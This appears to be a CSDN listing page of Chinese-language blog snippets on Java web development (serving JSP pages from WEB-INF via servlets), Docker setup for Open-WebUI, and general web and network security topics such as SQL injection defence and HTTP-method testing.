WEB-INF下面的文件具有安全性,直接在浏览器中输入地址是访问不到的,可以通过servlet来访问。 方法1: 利用/WEB-INF/a.jsp jspFile /WEB-INF/a.jsp jspFile /xxx 访问地址:http://localhost:8080/项目名/xxx 就可以看见内容了! 这种方法之针对
jsp页面放在WEB-INF目录内和WebContent目录内的区别
hgd95的博客
05-10 3321
部分jsp页面放在了WEB-INF目录下,这样做是因为:放在WebContent目录下的jsp页面可以被用户直接访问,而放在WEB-INF目录下的jsp页面就必须要通过请求才能访问,是要求隐藏性的,只让客户通过请求访问而不是直接访问jsp页面。 注意像css、js等页面资源文件不可以放到WEB-INF目录下,而应该直接放到WebContent目录下,否则即使页面中具有引用这些资源的代码也是不生效...
Docker安装Open-WebUI
一点的博客
02-20 2254
Open-WebUI 是一个用于管理和交互大规模语言模型(Large Language Models, LLMs)的自托管、用户友好型的Web界面。具备数据本地存储功能。
57 SSL-VPN WEB环境-CSDN博客.pdf
02-24
57 SSL-VPN WEB环境-CSDN博客
WEB前端-案例汇总
11-08
在“WEB前端-案例汇总”这个资源包中,包含了丰富的前端开发实例,旨在帮助初学者逐步进阶,全面掌握前端开发的各项技能。这个资源大汇总几乎涵盖了前端开发的所有领域,对于想要深入学习和理解Web前端技术的人来说...
N1Book-第二章Web进阶-Web文件上传漏洞
weixin_40872714的博客
03-31 4675
N1Book-第二章Web进阶-Web文件上传漏洞 以下内容转自 https://www.icode9.com/content-4-874265.html <?php header("Content-Type:text/html; charset=utf-8"); // 每5分钟会清除一次目录下上传的文件 //会包含文件pclzip.lib.php,感觉这个php里面是有一些针对zip包进行解压等的操作的 require_once('pclzip.lib.php'); //要是没上传文件,就输出
基于智能组网设备的港口网络安全闭环管控方案设计与实践
AUROWAN的博客
09-08 1018
摘要:随着港口数字化发展,网络安全问题日益突出。本文提出基于"纵深防御+动态闭环+智能化管理"的港口网络安全方案,采用高性能智能组网设备(主频880MHz,双频无线传输),构建覆盖内部网络、边界防护和闭环管控的综合安全体系。方案包含零信任架构、入侵检测、态势感知等模块,实现威胁发现、响应、溯源和策略优化的闭环管理。实施后能提升港口网络安全防御能力,为行业数字化转型提供安全保障。
谷歌官宣组建“网络攻击部门”,美国网络安全战略转向“以攻代防”
FreeBuf_的博客
08-28 1247
8月27日,谷歌宣布将组建网络攻击部门。
Web安全基石:深入理解与防御SQL注入漏洞
weixin_43676350的博客
09-08 1078
SQL注入虽然是一个"古老"的漏洞,但至今仍然十分常见且危害巨大。技术层面:强制使用参数化查询,实施输入验证,部署安全设备流程层面:建立安全开发生命周期(SDL),代码审计制度,定期渗透测试文化层面:培养开发人员安全意识,建立安全奖励机制,形成安全第一的企业文化作为安全测试人员,我们的责任不仅是发现漏洞,更要推动整个组织形成良好的安全生态。只有将安全融入每个开发环节,才能从根本上杜绝SQL注入等安全漏洞。安全不是产品,而是一个过程;不是技术问题,而是人的问题。延伸阅读SQLMap官方文档。
计算机网络7 第七章 网络安全
2301_80226956的博客
09-05 756
计算机网络7 网络安全
第三方web测评机构:【WEB安全测试中HTTP方法(GET/POST/PUT)的安全风险检测】
2503_92839163的博客
09-05 613
HTTP安全检测方法主要包括:GET方法需检查URL参数泄露(如token)、历史记录和日志残留;POST方法需验证CSRF防护(Token/Referer)和数据完整性(签名/防重放);PUT方法重点检测文件上传漏洞(类型绕过/路径遍历)和权限验证缺失。工具推荐使用BurpSuite、OWASP ZAP进行自动化扫描,同时应禁用不必要的HTTP方法并配置WAF规则。核心风险包括参数篡改、越权访问和文件上传漏洞。
基于安全抽象模型(SAM)的汽车网络安全防御与攻击分析
最新发布
NewCarRen的博客
09-10 542
自动驾驶汽车网络安全挑战与安全抽象模型(SAM)应用研究 摘要:本文针对自动驾驶汽车面临的网络安全挑战,提出安全抽象模型(SAM)作为解决方案。研究表明,自动驾驶汽车因高度依赖通信接口而面临前所未有的网络攻击风险。SAM通过整合攻击建模与系统开发流程,为早期架构设计提供安全支持。该模型采用元模型实体记录攻击场景,支持CVSS等评分系统,并促进跨部门协作。通过与行业专家的访谈评估,证实SAM具有可行性、易理解性和完整性,能有效实施"设计即安全"原则。研究为自动驾驶汽车网络安全提供了系统性方
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值